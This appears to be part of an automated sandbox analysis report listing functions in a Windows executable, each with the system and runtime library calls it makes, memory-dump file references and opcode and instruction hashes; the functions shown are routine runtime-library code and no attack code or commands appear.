                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1236291503-0
                                                                                                                                                                                                                                                                                • Opcode ID: bbbb43f9e1356fc36a8983c03ebcc8b7addcb0e166801d8c410c30bb16f29642
                                                                                                                                                                                                                                                                                • Instruction ID: 787c18d04fde2e0cfef7f9bacf8a475c91878827e9d3efa63496814f758c68bf
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bbbb43f9e1356fc36a8983c03ebcc8b7addcb0e166801d8c410c30bb16f29642
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E313D12A0C142E2FAF4BB6595513B9E391AF4A784FC4D03DE54D6B2E3DE3DA444A370
                                                                                                                                                                                                                                                                                Function 00007FF7333AD318 Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: FileHandleType
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3000768030-0
                                                                                                                                                                                                                                                                                • Opcode ID: b01a8b1655aeb6f71db35254c5ecf6a703e147159c44eee076082fbba724bcfb
                                                                                                                                                                                                                                                                                • Instruction ID: 13bfaa021ad294e57b9a6e655464e0c3d1f08c8bc92b2c5b7d553b3ccabdf0ca
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b01a8b1655aeb6f71db35254c5ecf6a703e147159c44eee076082fbba724bcfb
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 10318822A18B45A1D7B4AB15956017DA650FB45BB0FA4533DDBBE2B3E0CF38E491E310
                                                                                                                                                                                                                                                                                Function 00007FF7333AD034 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF7333AD020,?,?,?,?,?,00007FF7333AD129), ref: 00007FF7333AD080
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00007FF7333AD020,?,?,?,?,?,00007FF7333AD129), ref: 00007FF7333AD08A
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                                                                                • Opcode ID: fb6a81950565da05b050a92576ed7c02e19ce8787ed1f1a96796d90f6b6408b2
                                                                                                                                                                                                                                                                                • Instruction ID: 86f56972384edc0ee51995c681fc42d863597b0f088deb4b170699df414c1364
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb6a81950565da05b050a92576ed7c02e19ce8787ed1f1a96796d90f6b6408b2
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C11EF62A08A8291DAA0EB25B414079F361AB40BF4F948339EA7D1B7E9CE7CD041A714
                                                                                                                                                                                                                                                                                Function 00007FF7333A68E0 Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7333A67F5), ref: 00007FF7333A6913
                                                                                                                                                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7333A67F5), ref: 00007FF7333A6929
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1707611234-0
                                                                                                                                                                                                                                                                                • Opcode ID: 2039fd83e8b56068fe4c14b51341d05702151df0dd8c41e9036d506d0e0dfe63
                                                                                                                                                                                                                                                                                • Instruction ID: d728e9c1e666befd33b9826f2c8e2abad30749390e1fcebc6f7bd6afe7935e1e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2039fd83e8b56068fe4c14b51341d05702151df0dd8c41e9036d506d0e0dfe63
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D11913260C64291EBA4AB11A41117AF7A0FB85761F90523EF6AD919E8EF7CD004EB20
                                                                                                                                                                                                                                                                                Function 00007FF7333AB464 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,?,?,00007FF7333B3F92,?,?,?,00007FF7333B3FCF,?,?,00000000,00007FF7333B4495,?,?,?,00007FF7333B43C7), ref: 00007FF7333AB47A
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF7333B3F92,?,?,?,00007FF7333B3FCF,?,?,00000000,00007FF7333B4495,?,?,?,00007FF7333B43C7), ref: 00007FF7333AB484
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                                                                                • Opcode ID: bcb6ed366288f57e679071cac10841f4f6d99062b1a4c36b0c72b5ea8c3cbe48
                                                                                                                                                                                                                                                                                • Instruction ID: e7ddb64485332fcb4dcbea7c4607264fb131d417bac88d29c8c01cb1625578e7
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bcb6ed366288f57e679071cac10841f4f6d99062b1a4c36b0c72b5ea8c3cbe48
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62E08C51F0C642A2FFB97FF2A844078A1605F88740FC0C03CC92D66262DE3C68856330
                                                                                                                                                                                                                                                                                Function 00007FF7333ABA60 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(?,?,?,00007FF7333AB8DD,?,?,00000000,00007FF7333AB992), ref: 00007FF7333ABACE
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF7333AB8DD,?,?,00000000,00007FF7333AB992), ref: 00007FF7333ABAD8
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 918212764-0
                                                                                                                                                                                                                                                                                • Opcode ID: ee1f6f2c17bcac9912aebe9a75d3c59e1af1689cfc13c1c78b5a219ca8e97850
                                                                                                                                                                                                                                                                                • Instruction ID: aff0f6e1e3177aa62866d6276159e24ed71261d53213a4259abc72be266c54dc
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee1f6f2c17bcac9912aebe9a75d3c59e1af1689cfc13c1c78b5a219ca8e97850
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F21D521F1C68261FEF47765A4942BDA6819F447A0F88C23DDA3E677D1CE7CE4456320
                                                                                                                                                                                                                                                                                Function 00007FF7333ACDAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                • Opcode ID: e4b37d1ac90d15cfb184970c58ebde71eef6bb39a30608cbf4500616c80da583
                                                                                                                                                                                                                                                                                • Instruction ID: bee8a48395f346aba5116803da6d75208d3652b7639c96e82f173e600a7d2175
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e4b37d1ac90d15cfb184970c58ebde71eef6bb39a30608cbf4500616c80da583
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5411D3291824193EAB4EB1DE45017DF7A0EB55B41F908139D7AEA36D0CF3CE402E761
                                                                                                                                                                                                                                                                                Function 00007FF7333973D0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _fread_nolock
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 840049012-0
                                                                                                                                                                                                                                                                                • Opcode ID: 61035029c139f780a5569dd457c9cf41cb59d31def6763437cd94ac2d75dcbd5
                                                                                                                                                                                                                                                                                • Instruction ID: 57fcf2e19fdbc9e2f890ee04973735859d0138d0ea152557f26a13c1448c4d9c
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61035029c139f780a5569dd457c9cf41cb59d31def6763437cd94ac2d75dcbd5
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B218221B08692E5FAA0BA1265043FAEA51BF45BD4FC88438ED8D17787DE7CE081D610
                                                                                                                                                                                                                                                                                Function 00007FF7333AC83C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                • Opcode ID: 91dc31986c532176c65ca0e3ff35a3bba52d03db3277bf6d72548c5eb48738d3
                                                                                                                                                                                                                                                                                • Instruction ID: 5faaaac4f1f110a4717427cab2c29228569cb992088372320b919480a03f98f6
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91dc31986c532176c65ca0e3ff35a3bba52d03db3277bf6d72548c5eb48738d3
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35319032A1C652A5F6A17B19D4413BCA6A0AF44B51FC1813DDA7D633D2CE7CE441A334
                                                                                                                                                                                                                                                                                Function 00007FF7333AA899 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3947729631-0
                                                                                                                                                                                                                                                                                • Opcode ID: 78c35fc7c6e2b8000ddfa863f9affaf41ca53d2f0572e0ba78e1a207ed009a92
                                                                                                                                                                                                                                                                                • Instruction ID: 8f1b2165e78875ba3c09f052d08fb2b9279b925a6aa48dc80069dbbc1f3422ec
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78c35fc7c6e2b8000ddfa863f9affaf41ca53d2f0572e0ba78e1a207ed009a92
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D21A132E0878A9AEBA5EF64C4402FC73A0EB04318F85863ED67D66AC5EF38D544D750
                                                                                                                                                                                                                                                                                Function 00007FF7333A6F54 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                • Opcode ID: 0e1df9a836e05c53306103cf914f9f5afd0b17d2d4247778ac0f8a736a470cc7
                                                                                                                                                                                                                                                                                • Instruction ID: f01daa96b5daad4107eced2799b11fb45ab723f947bd14372f0fabb3515d2f13
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e1df9a836e05c53306103cf914f9f5afd0b17d2d4247778ac0f8a736a470cc7
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD119622A1C64191EAB0BF51D50067DE2A4BF55B80FC4C039EBAC77BA6CF3DD410A760
                                                                                                                                                                                                                                                                                Function 00007FF7333B75C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                • Opcode ID: 705a0604598582430d769309be7d52bb613e0b4e097a3a0cc12fb03a34ef158b
                                                                                                                                                                                                                                                                                • Instruction ID: e3f7eceb4abce90339f1324fcea0edc1466e6f5d682de0d587685bca59e724d8
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 705a0604598582430d769309be7d52bb613e0b4e097a3a0cc12fb03a34ef158b
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6821D732A18A8257DBB1AF28E440379B2A0EF84B94F948239EA9D577D5DF3CD4009B10
                                                                                                                                                                                                                                                                                Function 00007FF73339F914 Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                • Opcode ID: 43297e0cb54a728217cf8f13d9f8c23c45e2da10c33361e46a2ef0799771412d
                                                                                                                                                                                                                                                                                • Instruction ID: 8001328aae5313073fb0152ab7d186a8d1d39ce81f137251399a19a8b050dfa6
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43297e0cb54a728217cf8f13d9f8c23c45e2da10c33361e46a2ef0799771412d
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1401C821A08741A1EAA4FB529801179E694BF95FE0F88C739DEBC33BD6DE3CD4019310
                                                                                                                                                                                                                                                                                Function 00007FF7333A8E38 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                                • Opcode ID: 1708b530f5072f472fe09baedec27f5756de37f3e343805e4a7815c0544b33da
                                                                                                                                                                                                                                                                                • Instruction ID: 889be161400e98e21c287216094ced88c68fed38cb0fdf35639c3941274591a1
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1708b530f5072f472fe09baedec27f5756de37f3e343805e4a7815c0544b33da
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B401A121E0D642A0FAF47A256501575E990DF00791F84C23CEA7D6A6E6CF3CA4407232
